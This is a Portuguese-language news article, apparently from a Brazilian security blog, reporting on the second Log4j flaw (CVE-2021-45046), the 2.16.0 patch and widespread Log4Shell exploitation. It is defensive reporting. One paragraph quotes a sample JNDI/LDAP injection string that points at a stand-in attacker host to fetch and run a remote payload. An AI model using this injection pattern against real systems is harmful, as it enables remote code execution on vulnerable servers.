Categories: AMEAÇAS ATUAIS

Segunda vulnerabilidade Log4j (CVE-2021-45046) descoberta – Novo patch lançado

A segunda vulnerabilidade – rastreada como CVE-2021-45046 – é classificada como 3,7 de um máximo de 10 no sistema de classificação CVSS e afeta todas as versões do Log4j de 2.0-beta9 a 2.12.1 e 2.13.0 a 2.15.0, que os mantenedores do projeto enviados na semana passada para resolver uma vulnerabilidade crítica de execução remota de código (CVE-2021-44228) que poderia ser abusada para se infiltrar e assumir o controle de sistemas.

O remendo incompleto para CVE-2021-44228 , poderia ser abusado “para embarcações de dados de entrada utilizando um maliciosos JNDI padrão de pesquisa, resultando em um (DoS) de negação de serviço,” o ASF disse em um novo aviso. A versão mais recente do Log4j, 2.16.0 (para usuários que requerem Java 8 ou posterior), quase remove o suporte para pesquisas de mensagens e desabilita o JNDI por padrão, o componente que está no centro da vulnerabilidade. Recomenda-se aos usuários que precisam do Java 7 atualizar para o Log4j versão 2.12.2 quando estiver disponível.

“Lidar com o CVE-2021-44228 mostrou que o JNDI tem problemas de segurança significativos”, explicou Ralph Goers do ASF . “Embora tenhamos atenuado o que sabemos, seria mais seguro para os usuários desativá-lo completamente por padrão, especialmente porque a grande maioria provavelmente não o usará.”

JNDI, abreviação de Java Naming and Directory Interface, é uma API Java que permite que aplicativos codificados na linguagem de programação consultem dados e recursos, como servidores LDAP . Log4Shell é residente na biblioteca Log4j, uma estrutura de registro de código aberto baseada em Java comumente incorporada em servidores da web Apache.

O problema em si ocorre quando o componente JNDI do conector LDAP é aproveitado para injetar uma solicitação LDAP maliciosa – algo como “$ {jndi: ldap: // attacker_controled_website / payload_to_be_executed}” – que, quando conectado em um servidor da web executando a versão vulnerável da biblioteca, permite que um adversário recupere uma carga útil de um domínio remoto e a execute localmente.

A última atualização chega como consequência da falha que resultou em uma “verdadeira pandemia cibernética”, com vários agentes de ameaça aproveitando o Log4Shell de maneiras que estabelecem as bases para novos ataques , incluindo a implantação de mineradores de moedas, trojans de acesso remoto e ransomware em pessoas suscetíveis máquinas. As intrusões oportunistas teriam começado pelo menos desde 1º de dezembro, embora o bug tenha se tornado de conhecimento comum em 9 de dezembro.

A falha de segurança gerou um grande alarme porque existe em uma estrutura de registro usada quase onipresente em aplicativos Java, apresentando aos malfeitores um portal sem precedentes para penetrar e comprometer milhões de dispositivos em todo o mundo.

Soletrando mais problemas para as organizações, a falha explorável remotamente também afeta centenas dos principais produtos corporativos de várias empresas, como Akamai , Amazon , Apache , Apereo , Atlassian , Broadcom , Cisco , Cloudera , ConnectWise , Debian , Docker , Fortinet , Google , IBM , Intel , Juniper Networks , Microsoft , Okta ,Oracle , Red Hat , SolarWinds , SonicWall , Splunk , Ubuntu , VMware , Zscaler e Zoho , representando um risco significativo para a cadeia de suprimentos de software.

“Ao contrário de outros ciberataques principais que envolvem um ou um número limitado de software, Log4j é basicamente embutido em cada produto baseado em Java ou serviço web. É muito difícil de corrigir manualmente,” Israel empresa de segurança Check Point disse . “Esta vulnerabilidade, devido à complexidade de corrigir e à facilidade de exploração, parece que permanecerá conosco por muitos anos, a menos que as empresas e serviços tomem medidas imediatas para evitar os ataques a seus produtos implementando uma proteção.”

Nos dias após a divulgação do bug, pelo menos dez grupos diferentes entraram no movimento da exploração e cerca de 44% das redes corporativas em todo o mundo já estiveram sob ataque, marcando uma escalada significativa. A Agência de Segurança Cibernética e de Infraestrutura dos Estados Unidos (CISA) também adicionou Log4Shell ao seu Catálogo de Vulnerabilidades Exploradas Conhecidas , dando às agências federais um prazo de 24 de dezembro para incorporar patches para a vulnerabilidade.

Sean Gallagher, um pesquisador sênior de ameaças da Sophos, alertou que “os adversários provavelmente estão conseguindo o máximo de acesso a tudo o que podem agora com o objetivo de monetizar e / ou capitalizar sobre isso mais tarde”, acrescentando que há uma calmaria antes do tempestade em termos de atividade mais nefasta da vulnerabilidade Log4Shell. “

“A prioridade mais imediata para os defensores é reduzir a exposição corrigindo e mitigando todos os cantos de sua infraestrutura e investigar sistemas expostos e potencialmente comprometidos. Essa vulnerabilidade pode estar em qualquer lugar”, acrescentou Gallagher.

Fonte: https://thehackernews.com/

Ninja

Na cena de cybersecurity a mais de 25 anos, Ninja trabalha como evangelizador de segurança da informação no Brasil. Preocupado com a conscientização de segurança cibernética, a ideia inicial é conseguir expor um pouco para o publico Brasileiro do que acontece no mundo.

Share
Published by
Ninja

Recent Posts

Vulnerabilidade crítica no servidor MCP do GitHub permite acesso não autorizado a repositórios privados

Falha permite que invasores manipulem o agente de um usuário por meio de um problema…

2 semanas ago

Suposto 0-Day da Fortinet está à venda em cantos obscuros da web

Um exploit de dia zero, dirigido aos firewalls FortiGate da Fortinet, foi descoberto à venda…

2 meses ago

Pesquisadores descobrem a família de malware Shelby que abusa do GitHub para comando e controle

A família SHELBY mostra um exemplo preocupante de malware moderno com design modular, sofisticado e…

2 meses ago

Hackers abusam de plugins MU do WordPress para esconder código malicioso

Hackers estão explorando o diretório mu-plugins do WordPress para injetar códigos maliciosos que não aparecem…

2 meses ago

Google lança duas novas ferramentas de IA para detectar golpes conversacionais em dispositivos Android

O Google implementou uma nova funcionalidade de "Detecção de Golpes" com inteligência artificial no aplicativo…

3 meses ago

APT28 aprimora técnicas de ofuscação com trojans HTA avançados

O grupo APT28, ligado à Rússia, está utilizando técnicas avançadas de ofuscação em seus ataques…

3 meses ago